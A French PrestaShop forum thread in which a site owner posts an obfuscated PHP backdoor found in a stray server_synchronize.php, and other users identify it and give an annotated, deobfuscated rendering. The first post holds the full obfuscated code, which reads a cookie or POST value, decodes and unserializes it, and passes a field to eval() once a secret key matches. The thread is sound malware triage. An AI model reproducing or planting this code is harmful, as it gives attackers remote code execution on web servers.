yanoch_newbie

code suspect dans le server_synchronize.php


Bonjour

Voici le code que je trouve dans le fichier server_synchronize.php 

Est-ce que ça vous semble normal ?

// Obfuscated PHP sample exactly as posted. The opening <?php tag is not shown, and the
// forum hard-wrapped the payload, in one place in the middle of an array key.
// How it is put together, from the visible code:
//  - $r9418 is assigned $GLOBALS and is then used as the container for everything below.
//  - The entry 'r168d1' is a lookup string written as hex escapes. Every function name,
//    constant name and array key is spelled by concatenating single characters picked
//    from that string by index, so none of those names appears in clear text.
//  - Entries with random-looking names receive the strings chr, ord, define, strlen,
//    defined, ini_set, serialize, phpversion, unserialize, base64_decode and
//    set_time_limit, plus the names of the two helper functions defined further down,
//    and are then called as variable functions. $_POST and $_COOKIE are stored in two
//    more entries.
//  - The tail decodes one request value, unserialize()s it, compares a field with an
//    embedded key and, on a match, either prints the PHP version or passes a field to eval().
// Detection notes: a keyword scan for base64_decode or unserialize does not match this
// text. What does appear literally is the hex-escaped variable-variable for GLOBALS at the
// start, the long run of "\x.." escapes, `eval/*l3ba4*/(` with a comment wedged between
// the keyword and the parenthesis, and the direct use of $_POST and $_COOKIE.
$h2bf1 = 851;$GLOBALS['r9418'] = Array();global $r9418;$r9418 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['r168d1'] = "\x39\x73\x3e\x76\x5e\x33\x37\x27\x61\x48\x4f\x29\x5f\x6e\x43\x2c\x45\x20\x25\x4e\x41\x6b\x65\xa\x4a\x23\x31\x34\x53\x42\x54\x6f\x44\x9\x22\x72\x5a\x66\x38\x7a\x3d\xd\x49\x3b\x47\x55\x6c\x35\x60\x3c\x52\x78\x62\x59\x46\x2b\x7d\x75\x2d\x51\x58\x67\x79\x50\x21\x5d\x68\x57\x7e\x36\x2a\x71\x69\x30\x3a\x64\x4c\x7b\x56\x74\x77\x5b\x6d\x7c\x26\x4b\x4d\x5c\x24\x6a\x70\x2f\x32\x63\x2e\x40\x28\x3f";$r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]] = $r9418['r168d1'][93].$r9418['r168d1'][66].$r9418['r168d1'][35];$r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]] = $r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]] = $r9418['r168d1'][1].$r9418['r168d1'][79].$r9418['r168d1'][35].$r9418['r168d1'][46].$r9418['r168d1'][22].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]] = 
$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][72].$r9418['r168d1'][12].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]] = $r9418['r168d1'][90].$r9418['r168d1'][66].$r9418['r168d1'][90].$r9418['r168d1'][3].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][1].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]] = $r9418['r168d1'][57].$r9418['r168d1'][13].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]] = $r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][27].$r9418['r168d1'][12].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][31].$r9418['r168d1'][75].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]] = 
$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][72].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]] = $r9418['r168d1'][39].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][5];$r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]] = $r9418['r168d1'][66].$r9418['r168d1'][0].$r9418['r168d1'][93].$r9418['r168d1'][8].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] = $_POST;$r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] = $_COOKIE;@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61], NULL);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][1], 
0);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][82].$r9418['r168d1'][8].$r9418['r168d1'][51].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][51].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][57].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22], 0);@$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]](0);if (!$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8])){$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r1
68d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8], 1);$r6ea = NULL;$o16aa8 = NULL;$r9418[$r9418['r168d1'][79].$r9418['r168d1'][27].$r9418['r168d1'][6].$r9418['r168d1'][38]] = $r9418['r168d1'][75].$r9418['r168d1'][8].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][58].$r9418['r168d1'][27].$r9418['r168d1'][37].$r9418['r168d1'][0].$r9418['r168d1'][52].$r9418['r168d1'][58].$r9418['r168d1'][0].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][92].$r9418['r168d1'][58].$r9418['r168d1'][47].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][69].$r9418['r168d1'][38].$r9418['r168d1'][69].$r9418['r168d1'][26].$r9418['r168d1'][92].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][22].$r9418['r168d1'][92];global $t478;function  h9cae($r6ea, $y53d39940){global $r9418;$w3d230 = "";for ($qefa1=0; $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea);){for ($c7d8b4=0; 
$c7d8b4<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($y53d39940) && $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea); $c7d8b4++, $qefa1++){$w3d230 .= $r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]]($r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($r6ea[$qefa1]) ^ $r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($y53d39940[$c7d8b4]));}}return $w3d230;}function  z21ea3($r6ea, $y53d39940){global $r9418;global $t478;return $r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r6ea, $t478), $y53d39940);}foreach ($r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}if (!$r6ea){foreach ($r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}}$r6ea = @$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]]($r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]]($r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]]($r6ea), $o16aa8));if 
(isset($r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]) && $t478==$r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]){if ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][72]){$qefa1 = Array($r9418['r168d1'][90].$r9418['r168d1'][3] => @$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]](),$r9418['r168d1'][1].$r9418['r168d1'][3] => $r9418['r168d1'][26].$r9418['r168d1'][94].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][26],);echo @$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]]($qefa1);}elseif ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][22]){eval/*l3ba4*/($r6ea[$r9418['r168d1'][75]]);}exit();}} ?>


C'est quoi ce fichier déjà à la base ????

car il ne me semble pas exister dans l'archive de n'importe quelle version de PrestaShop.

donc poubelle si vous ne savez pas, et surtout il faut trouver comment il est arrivé là.


Le fichier est dans le dossier phpMA qui est lui même à la racine du prestashop 1.4.7.2

 

Je peux simplement enlever le code suspect .....sinon 

Edited by yanoch_newbie (see edit history)


phpMA n'existe pas non plus, donc si vous ne savez pas, vous renommez ou vous effacez, mais tout cela pue grave.


Pour info, une fois "nettoyé" (c'est juste pour le rendre lisible et compréhensible) le code ressemble à :

 

<?php 
// Hand-cleaned rendering of the obfuscated sample posted at the top of this thread. It is
// meant for reading only and is not valid PHP as listed: string quotes were dropped, and
// compared with the obfuscated text a few characters were lost (ini_set, set_time_limit
// and base64_decode appear without their underscores, `.=` appears as `=`, and the
// string "1.0-1" appears as 10-1).
//
// What the code is: a request-driven backdoor. It takes one value from a cookie or POST
// field, decodes it, unserialize()s it and, when an embedded key matches, either reports
// the PHP version or passes a field of the decoded data to eval().
//
// For responders: the eval() branch runs arbitrary PHP with the web server's privileges,
// so deleting this snippet does not tell you what was already executed or modified
// through it. The file itself, other files on the host, and the way the code was planted
// all need to be investigated.

// Switch off PHP error logging and the execution time limit for this request (ini_set and
// set_time_limit in the obfuscated text). With logging disabled, PHP's own error log
// will not show this code's activity; the web server access log is the place to look.
@iniset(error_log, NULL);
@iniset(log_errors, 0);
@iniset(max_execution_time, 0);
@settimelimit(0);
// Run-once guard for the current request. Presumably this covers the case where the same
// snippet sits in several files loaded by one request; the constant name is a fixed
// string that can be searched for across the web root.
if (!defined(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba))
{
    define(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba, 1);
    $r6ea = NULL;
    $o16aa8 = NULL;
    // In the obfuscated text this line stores the quoted string below under the global
    // name t478. It serves as the embedded secret: first XOR key in z21ea3() and the
    // value the 'ak' field must equal further down.
    [t478] = da5b6e70-3ede-4f9b-93e2-51f6861295e2;
    global $t478;
    // XOR of $r6ea with the key $y53d39940, the key repeating when it is shorter than the
    // data. The obfuscated text appends each decoded character with `.=`; the `=` shown
    // here would keep only the last one.
    function  h9cae($r6ea, $y53d39940)
    {
        // The empty `global ;` is what remains of `global $r9418;`, the lookup container
        // that the cleaned listing no longer needs.
        global ;
        $w3d230 = "";
        for ($qefa1=0; $qefa1<strlen($r6ea);) {
            for ($c7d8b4=0; $c7d8b4<strlen($y53d39940) && $qefa1<strlen($r6ea); $c7d8b4++, $qefa1++) {
                $w3d230 = chr(ord($r6ea[$qefa1]) ^ ord($y53d39940[$c7d8b4]));
            }
        }
        return $w3d230;
    }

    // Two XOR passes: first with the embedded secret $t478, then with $y53d39940.
    function  z21ea3($r6ea, $y53d39940)
    {
        global ;
        global $t478;
        return h9cae(h9cae($r6ea, $t478), $y53d39940);
    }

    // After the loop $r6ea holds the value and $o16aa8 the name of the last cookie sent.
    foreach ($_COOKIE as $y53d39940=>$f9f33e70a) {
        $r6ea = $f9f33e70a;
        $o16aa8 = $y53d39940;
    }

    // No usable cookie value: fall back to the last POST field in the same way.
    if (!$r6ea) {
        foreach ($_POST as $y53d39940=>$f9f33e70a) {
            $r6ea = $f9f33e70a;
            $o16aa8 = $y53d39940;
        }
    }

    // The value is base64-decoded (base64_decode in the obfuscated text), XOR-decoded with
    // the field name as second key, then unserialize()d. Calling unserialize() on
    // request-controlled bytes is unsafe in its own right; the @ hides the warnings that
    // ordinary, non-matching requests would otherwise raise.
    $r6ea = @unserialize(z21ea3(base64decode($r6ea), $o16aa8));
    // Gate: the decoded array must carry the embedded secret in its 'ak' field (loose ==).
    // Requests that do not match fall through to whatever follows this code in the file.
    if (isset($r6ea[ak]) && $t478==$r6ea[ak]) {
        if ($r6ea[a] == i) {
            // Action 'i': reply with a serialized array holding the PHP version and a
            // fixed tag (the string "1.0-1" in the obfuscated text). Looks like a
            // check-in reply; that reading is an inference.
            $qefa1 = Array(pv => @phpversion(),sv => 10-1,);
            echo @serialize($qefa1);
        } elseif ($r6ea[a] == e) {
        // Action 'e': run the 'd' field as PHP code. The /*l3ba4*/ comment sits between
        // `eval` and `(`, so a search for the exact text "eval(" does not match it.
        eval/*l3ba4*/($r6ea[d]);
        }
        // Stop here so the rest of the hosting file never runs for a matching request.
        exit();
    }
}

 

donc si dans un module ou un autre fichier tu retrouves un code totalement illisible, tu sauras qu'il y a un lien
